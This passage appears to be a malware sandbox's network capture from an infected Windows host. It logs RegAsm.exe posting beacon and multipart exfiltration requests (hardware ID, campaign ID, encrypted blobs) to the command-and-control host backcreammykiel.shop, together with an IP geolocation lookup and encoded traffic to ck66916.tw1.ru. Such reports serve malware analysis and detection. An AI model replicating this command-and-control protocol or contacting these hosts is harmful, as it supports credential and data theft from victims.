0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:57:59.939810038 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.4	49730	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:53:53 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-23 04:53:53 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Sun, 23 Jun 2024 04:53:53 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-23 04:53:53 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:15 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: backcreammykiel.shop
2024-06-23 04:54:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-06-23 04:54:15 UTC	818	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6je6s0p96ve12itp3nn6f0m7l3; expires=Wed, 16-Oct-2024 22:40:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajnPQLCfuOrjv%2F4cKewbDc%2BAv7kJPahO0zAMpHZfNmknqVbIpJRAlD9nSkddFxEZfZ%2Bnna26N%2FLjX2xs%2BieWw5UE%2BYp8OiYtfRCSFg2sd78UP2pzn2Sqec%2BHOL0yQHxUrU%2FGxTrKxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e1090f514294-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-06-23 04:54:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:16 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 57 Host: backcreammykiel.shop
2024-06-23 04:54:16 UTC	57	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 74 74 65 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@Qudette&j=default
2024-06-23 04:54:16 UTC	814	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uvktu02378fgs56ss43a7tun49; expires=Wed, 16-Oct-2024 22:40:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0EInoCYdw0TVaZNHfufF7ts5ZgzynJ%2FbX7lnSr5KN4QjXg3MaBrbFKRWxT8CLQOMlo4aLysfEpVMb1VG5N%2FB8YlFn5zuuwWLiAF%2FqQeIUdBBzFiUoq%2BNhanG%2Ff%2BX4x4hIqnkfk9dg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e10e9a4619d3-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:16 UTC	555	IN	Data Raw: 34 64 65 0d 0a 53 6a 51 74 5a 62 44 37 62 46 7a 48 34 36 69 45 67 6c 63 37 58 47 50 36 53 73 75 7a 42 35 4c 31 39 42 65 31 70 4a 42 4c 73 37 49 78 50 69 52 48 78 74 6c 57 66 50 50 50 6f 6f 32 67 4a 46 35 2b 57 64 6f 2b 75 63 5a 69 76 76 2f 39 4e 64 54 41 73 6e 47 54 31 43 74 59 58 67 43 63 38 57 56 2b 6f 70 75 4b 76 71 49 4d 4d 56 56 71 67 57 72 70 31 6d 6d 77 7a 39 51 31 30 4d 37 79 4b 74 2f 51 4b 31 39 43 46 64 79 59 42 44 43 67 69 38 33 6e 35 6a 5a 58 4d 51 61 66 4c 36 72 5a 61 66 75 59 6e 48 71 58 69 4c 42 70 31 73 68 6f 44 67 31 48 2f 5a 34 59 50 59 71 43 32 2b 2b 67 64 30 5a 77 61 66 4e 44 73 4a 4d 6c 39 35 76 57 4c 5a 57 47 38 53 37 52 33 69 78 51 52 67 33 59 6b 77 67 2f 6f 34 6e 59 37 65 51 2f 55 7a 34 48 6b 79 57 68 77 32 76 30 6e 35 70 30 32 73 Data Ascii: 4deSjQtZbD7bFzH46iEglc7XGP6SsuzB5L19Be1pJBLs7IxPiRHxtlWfPPPoo2gJF5+Wdo+ucZivv/9NdTAsnGT1CtYXgCc8WV+opuKvqIMMVVqgWrp1mmwz9Q10M7yKt/QK19CFdyYBDCgi83n5jZXMQafL6rZafuYnHqXiLBp1shoDg1H/Z4YPYqC2++gd0ZwafNDsJMl95vWLZWG8S7R3ixQRg3Ykwg/o4nY7eQ/Uz4HkyWhw2v0n5p02s
2024-06-23 04:54:16 UTC	698	IN	Data Raw: 49 75 33 5a 42 77 46 41 38 44 30 35 30 50 4f 71 75 50 7a 75 72 6d 4f 31 51 78 42 35 49 6f 72 74 74 74 2b 4a 61 62 66 74 6a 47 39 79 54 56 31 69 52 58 53 6b 65 63 32 30 34 35 76 63 47 53 70 4b 41 62 58 6a 30 54 32 68 32 71 33 32 76 33 67 64 59 33 79 49 69 61 51 72 72 4a 61 68 5a 49 43 35 4c 42 54 48 36 72 68 4d 58 30 34 53 64 63 4d 42 4f 55 4c 61 2f 63 5a 76 36 58 6b 33 4c 61 79 50 51 75 30 74 67 73 56 30 45 4c 32 4a 6f 4b 50 65 58 50 69 4b 62 6e 4c 52 6c 6d 51 39 67 5a 71 74 56 69 34 70 53 59 4e 5a 58 5a 76 45 47 36 75 7a 45 55 44 77 44 65 32 56 5a 38 35 59 76 4d 36 2b 6b 2b 58 6a 59 4e 69 69 4f 6d 30 6d 7a 33 6b 5a 78 32 33 38 7a 30 4a 39 44 58 4c 56 46 64 43 64 6d 55 44 54 53 6a 77 59 53 6b 6f 44 4a 42 66 6c 6e 61 61 49 66 53 64 4f 61 6c 6c 57 54 47 68 Data Ascii: Iu3ZBwFA8D050POquPzurmO1QxB5Iorttt+JabftjG9yTV1iRXSkec2045vcGSpKAbXj0T2h2q32v3gdY3yIiaQrrJahZIC5LBTH6rhMX04SdcMBOULa/cZv6Xk3LayPQu0tgsV0EL2JoKPeXPiKbnLRlmQ9gZqtVi4pSYNZXZvEG6uzEUDwDe2VZ85YvM6+k+XjYNiiOm0mz3kZx238z0J9DXLVFdCdmUDTSjwYSkoDJBflnaaIfSdOallWTGh
2024-06-23 04:54:16 UTC	1369	IN	Data Raw: 34 63 30 32 0d 0a 35 77 35 38 48 4e 2f 71 42 74 47 33 34 6c 6c 6a 2b 39 32 69 66 46 6c 4a 68 37 30 4e 43 79 61 38 36 65 51 44 30 6b 48 70 44 5a 43 54 4c 6c 32 59 69 6d 37 6a 68 53 4d 67 61 52 4b 61 72 52 62 2f 36 59 6e 48 33 66 78 76 38 6f 32 74 67 75 57 30 51 49 33 5a 34 47 50 61 6d 45 78 2b 57 67 65 78 74 2b 42 6f 42 6f 38 5a 4d 6c 31 5a 6d 56 5a 4d 61 45 78 79 72 66 33 69 39 41 44 30 58 4e 31 32 5a 56 7a 70 69 49 70 75 63 35 47 57 5a 44 32 43 4b 75 31 6d 48 39 6e 5a 56 78 30 38 76 39 49 4e 6a 5a 4f 6c 78 44 43 63 43 55 42 44 75 72 6a 63 2f 70 34 44 52 59 4d 41 75 54 61 4f 65 54 4a 66 65 50 31 69 32 56 68 74 30 6b 77 63 49 69 58 56 35 46 35 35 6f 41 4d 4b 4b 58 69 71 54 2f 65 7a 46 56 61 6f 46 71 36 64 5a 70 73 4d 2f 55 4e 64 7a 41 2f 69 58 52 31 6a 70 Data Ascii: 4c025w58HN/qBtG34llj+92ifFlJh70NCya86eQD0kHpDZCTLl2Yim7jhSMgaRKarRb/6YnH3fxv8o2tguW0QI3Z4GPamEx+Wgext+BoBo8ZMl1ZmVZMaExyrf3i9AD0XN12ZVzpiIpuc5GWZD2CKu1mH9nZVx08v9INjZOlxDCcCUBDurjc/p4DRYMAuTaOeTJfeP1i2Vht0kwcIiXV5F55oAMKKXiqT/ezFVaoFq6dZpsM/UNdzA/iXR1jp
2024-06-23 04:54:16 UTC	1369	IN	Data Raw: 5a 63 45 50 36 4b 50 7a 2b 62 6e 50 56 59 79 43 70 35 6f 35 35 4d 6c 39 34 2f 57 4c 5a 57 47 33 69 4c 56 78 6a 4d 57 44 52 69 63 38 57 56 56 76 4d 4f 4b 34 65 78 31 41 58 78 42 6d 79 79 70 30 47 58 34 68 5a 5a 6e 30 38 58 30 4a 39 6a 66 49 6c 6c 4f 43 64 69 51 43 54 6d 6f 68 38 58 6c 37 7a 52 64 4d 41 44 59 5a 75 75 52 59 75 6a 58 7a 6a 65 58 36 66 45 2f 32 35 42 71 53 51 46 76 75 66 49 58 66 4f 57 47 78 71 61 34 64 78 6b 30 44 5a 77 72 70 64 68 70 2f 5a 61 53 63 74 72 43 38 69 2f 58 31 53 6c 64 52 77 76 64 6b 77 49 36 71 59 6a 4d 36 75 4d 32 58 33 35 50 32 6d 69 75 79 53 57 6f 31 64 5a 55 32 73 33 2b 4b 64 4c 42 4c 78 59 42 52 5a 4b 58 43 44 37 6c 32 59 6a 77 38 43 4a 65 66 42 37 57 51 4d 4b 36 66 4c 4c 58 6b 58 6d 58 6e 72 42 70 32 38 49 74 57 45 73 4e Data Ascii: ZcEP6KPz+bnPVYyCp5o55Ml94/WLZWG3iLVxjMWDRic8WVVvMOK4ex1AXxBmyyp0GX4hZZn08X0J9jfIllOCdiQCTmoh8Xl7zRdMADYZuuRYujXzjeX6fE/25BqSQFvufIXfOWGxqa4dxk0DZwrpdhp/ZaSctrC8i/X1SldRwvdkwI6qYjM6uM2X35P2miuySWo1dZU2s3+KdLBLxYBRZKXCD7l2Yjw8CJefB7WQMK6fLLXkXmXnrBp28ItWEsN
2024-06-23 04:54:16 UTC	1369	IN	Data Raw: 71 75 6a 63 2f 6a 37 7a 5a 51 4f 77 69 57 4f 71 44 66 62 66 69 59 6b 33 37 58 79 2f 67 6c 30 64 4e 6f 47 41 31 48 31 59 46 4f 5a 75 66 42 2b 4f 76 73 49 31 34 78 51 64 6f 33 35 37 6b 4f 6d 34 37 55 4e 64 44 4b 73 6e 47 54 6b 43 39 53 54 77 4c 63 6e 41 4d 36 71 49 72 59 39 4f 41 77 57 44 59 47 69 69 53 6a 32 6d 58 2b 6c 4a 31 31 31 73 72 7a 4a 39 54 5a 61 42 67 4e 52 39 57 42 54 6d 62 6e 77 65 58 6c 38 43 4e 53 50 51 33 59 61 72 61 66 44 5a 76 38 6a 7a 65 58 77 66 35 70 69 5a 4a 6f 57 6b 4d 43 30 35 34 50 4e 36 57 43 32 4f 48 67 4d 56 49 78 44 5a 59 6b 6f 74 70 75 38 35 32 66 64 74 76 41 38 79 66 52 33 69 67 57 41 55 57 53 6e 68 5a 2b 2f 63 4f 4b 78 75 73 6a 54 44 30 52 6e 69 2b 6c 6b 53 66 76 32 66 34 65 76 4e 2b 77 61 64 62 63 61 41 34 4e 52 39 79 4c 43 Data Ascii: qujc/j7zZQOwiWOqDfbfiYk37Xy/gl0dNoGA1H1YFOZufB+OvsI14xQdo357kOm47UNdDKsnGTkC9STwLcnAM6qIrY9OAwWDYGiiSj2mX+lJ111srzJ9TZaBgNR9WBTmbnweXl8CNSPQ3YarafDZv8jzeXwf5piZJoWkMC054PN6WC2OHgMVIxDZYkotpu852fdtvA8yfR3igWAUWSnhZ+/cOKxusjTD0Rni+lkSfv2f4evN+wadbcaA4NR9yLC
2024-06-23 04:54:16 UTC	1369	IN	Data Raw: 47 70 72 68 33 47 54 59 4d 6b 43 4b 74 31 6d 6a 33 6b 5a 39 6e 33 73 50 38 4b 64 58 62 4a 31 42 4c 42 4e 4b 4c 43 44 71 74 67 73 66 72 37 6a 5a 64 66 6b 2f 61 61 4b 37 4a 4a 61 6a 56 31 6b 66 61 79 4f 6b 6d 31 73 45 69 46 67 30 59 6e 50 46 6c 56 62 7a 44 69 75 48 73 64 51 46 38 51 5a 77 6d 75 39 70 6b 2b 35 79 59 63 74 6a 44 2b 43 6e 65 31 43 74 59 52 41 62 52 6b 51 4d 7a 71 34 76 44 37 2b 63 35 58 54 6c 42 31 6d 72 70 31 6e 32 77 7a 39 51 31 2f 4f 66 66 42 64 62 4b 61 42 52 51 53 62 72 79 5a 53 66 6e 77 63 33 71 6f 47 30 62 66 67 32 52 4a 4b 50 61 59 76 71 5a 6e 33 76 63 31 4f 41 71 31 64 4d 68 56 55 67 4f 33 4a 6b 4a 4f 36 75 47 79 2b 33 6b 50 31 6f 34 51 64 5a 71 36 64 5a 39 73 4d 2f 55 4e 66 76 46 38 69 54 4c 6b 47 70 4a 41 57 2b 35 38 68 64 38 35 59 Data Ascii: Gprh3GTYMkCKt1mj3kZ9n3sP8KdXbJ1BLBNKLCDqtgsfr7jZdfk/aaK7JJajV1kfayOkm1sEiFg0YnPFlVbzDiuHsdQF8QZwmu9pk+5yYctjD+Cne1CtYRAbRkQMzq4vD7+c5XTlB1mrp1n2wz9Q1/OffBdbKaBRQSbryZSfnwc3qoG0bfg2RJKPaYvqZn3vc1OAq1dMhVUgO3JkJO6uGy+3kP1o4QdZq6dZ9sM/UNfvF8iTLkGpJAW+58hd85Y
2024-06-23 04:54:16 UTC	1369	IN	Data Raw: 4d 78 6c 77 51 39 67 76 73 5a 45 39 73 74 65 32 62 74 72 4b 39 57 6d 54 7a 32 59 2b 4a 47 7a 4c 32 30 34 35 71 63 47 53 70 4b 41 2b 56 54 6f 47 6d 43 57 71 32 57 44 30 6e 5a 4e 31 33 39 54 36 4b 64 62 43 4f 6c 5a 47 41 74 36 61 44 6a 71 6a 69 4d 7a 6c 35 48 55 58 66 45 47 66 4d 4f 6d 4a 4a 37 43 36 6d 6e 4c 2b 77 65 6c 70 6b 38 39 6d 50 69 52 73 79 39 74 4f 4f 61 6e 42 6b 71 53 67 4e 46 49 30 44 70 55 72 72 39 4a 75 39 5a 32 58 63 74 2f 4c 34 43 72 65 33 79 78 57 51 41 48 55 6d 41 45 34 6f 6f 6a 4c 37 75 64 31 46 33 78 42 6e 7a 44 70 69 53 65 77 75 5a 46 32 30 34 61 77 4e 70 2b 34 51 7a 31 57 52 5a 4b 65 41 6e 37 39 77 34 72 6d 36 6a 39 54 4d 41 47 66 4f 71 2f 59 5a 66 4f 46 6c 58 50 66 77 50 34 6c 33 4e 67 68 56 6b 6f 4d 33 35 49 44 4f 4b 57 4b 79 36 61 Data Ascii: MxlwQ9gvsZE9ste2btrK9WmTz2Y+JGzL2045qcGSpKA+VToGmCWq2WD0nZN139T6KdbCOlZGAt6aDjqjiMzl5HUXfEGfMOmJJ7C6mnL+welpk89mPiRsy9tOOanBkqSgNFI0DpUrr9Ju9Z2Xct/L4Cre3yxWQAHUmAE4oojL7ud1F3xBnzDpiSewuZF204awNp+4Qz1WRZKeAn79w4rm6j9TMAGfOq/YZfOFlXPfwP4l3NghVkoM35IDOKWKy6a
2024-06-23 04:54:16 UTC	1369	IN	Data Raw: 56 62 49 65 73 47 36 44 75 2f 5a 2f 68 36 38 33 35 70 43 75 72 74 6f 51 41 39 66 6b 4d 74 41 56 73 37 71 6f 61 62 79 64 51 46 38 51 64 38 72 75 38 4e 6a 38 34 47 56 4d 75 6e 34 31 54 50 63 31 6a 39 48 63 54 6e 56 67 77 4d 34 73 70 43 47 38 2b 4d 37 56 7a 6b 58 32 47 62 42 75 67 36 62 31 35 6b 31 6a 34 54 4c 61 5a 6d 51 46 78 67 6e 62 4c 6e 79 54 69 62 6c 32 59 69 6d 31 54 5a 58 4d 41 61 4f 4f 65 54 32 66 2f 32 52 67 57 53 58 69 4a 70 43 75 72 74 6f 55 41 39 66 6b 4d 6c 41 56 73 37 71 6f 61 62 6b 4a 42 6c 6d 51 38 68 36 38 6f 51 32 70 38 66 45 48 62 79 74 37 57 65 35 75 30 4e 50 4a 32 79 35 38 6b 34 6f 35 64 6d 49 74 4b 35 64 4d 6c 56 71 32 44 72 70 69 53 65 77 30 4a 56 6e 78 63 44 78 50 39 4b 58 46 6d 68 68 41 4e 53 63 43 53 37 6e 72 38 48 79 35 33 55 58 Data Ascii: VbIesG6Du/Z/h6835pCurtoQA9fkMtAVs7qoabydQF8Qd8ru8Nj84GVMun41TPc1j9HcTnVgwM4spCG8+M7VzkX2GbBug6b15k1j4TLaZmQFxgnbLnyTibl2Yim1TZXMAaOOeT2f/2RgWSXiJpCurtoUA9fkMlAVs7qoabkJBlmQ8h68oQ2p8fEHbyt7We5u0NPJ2y58k4o5dmItK5dMlVq2DrpiSew0JVnxcDxP9KXFmhhANScCS7nr8Hy53UX
2024-06-23 04:54:16 UTC	1369	IN	Data Raw: 50 43 75 69 58 30 68 74 59 74 6c 5a 61 67 63 6f 53 44 66 77 59 64 62 37 6e 79 45 58 44 4e 36 71 48 2f 69 46 34 79 56 55 47 4f 61 50 47 54 4e 37 37 2f 2f 52 36 38 68 75 42 70 69 5a 4a 6f 45 55 77 56 77 4a 38 4e 4b 4b 62 47 39 4e 6a 68 4f 46 5a 79 44 35 4d 6f 72 73 46 7a 36 39 75 65 64 73 33 63 7a 42 66 36 33 43 35 52 56 51 44 55 76 79 35 2b 36 2b 6d 68 6a 59 74 31 56 6e 35 5a 32 68 48 70 6d 53 58 50 32 66 34 65 76 4b 32 79 4d 5a 47 49 61 68 5a 36 42 4e 79 58 43 53 69 30 7a 4f 4c 46 32 67 38 62 45 67 61 4e 61 70 33 57 64 65 47 63 6d 33 6d 58 69 4a 70 43 75 72 74 6f 55 41 39 66 6b 4d 6c 41 56 73 37 71 6f 61 62 6b 4a 42 6c 6d 51 38 68 36 38 6f 51 32 70 38 66 45 48 62 79 74 37 57 65 35 75 30 4e 50 4a 32 79 35 38 6b 34 6f 35 64 6d 49 74 4b 35 64 4d 6c 56 71 32 Data Ascii: PCuiX0htYtlZagcoSDfwYdb7nyEXDN6qH/iF4yVUGOaPGTN77//R68huBpiZJoEUwVwJ8NKKbG9NjhOFZyD5MorsFz69ueds3czBf63C5RVQDUvy5+6+mhjYt1Vn5Z2hHpmSXP2f4evK2yMZGIahZ6BNyXCSi0zOLF2g8bEgaNap3WdeGcm3mXiJpCurtoUA9fkMlAVs7qoabkJBlmQ8h68oQ2p8fEHbyt7We5u0NPJ2y58k4o5dmItK5dMlVq2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:17 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18166 Host: backcreammykiel.shop
2024-06-23 04:54:17 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
2024-06-23 04:54:17 UTC	2835	OUT	Data Raw: 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R
2024-06-23 04:54:17 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q54u04gi2lpcsissi771gcf0u3; expires=Wed, 16-Oct-2024 22:40:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM8SDXHiLoq33Yo5yQTdL4knXc7muNtcAO8zt6U7RnWUrvX7Qd0FfAxZvlZ4JfgK6N5Pc%2FIY53SBMkvbR63XU0KDmOR5dF7a9FiNyO%2FbyyvA1jRegUhheTOhfXouHaiRR1ElIyc0vg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e1151d7c9e17-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:17 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 04:54:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:18 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8787 Host: backcreammykiel.shop
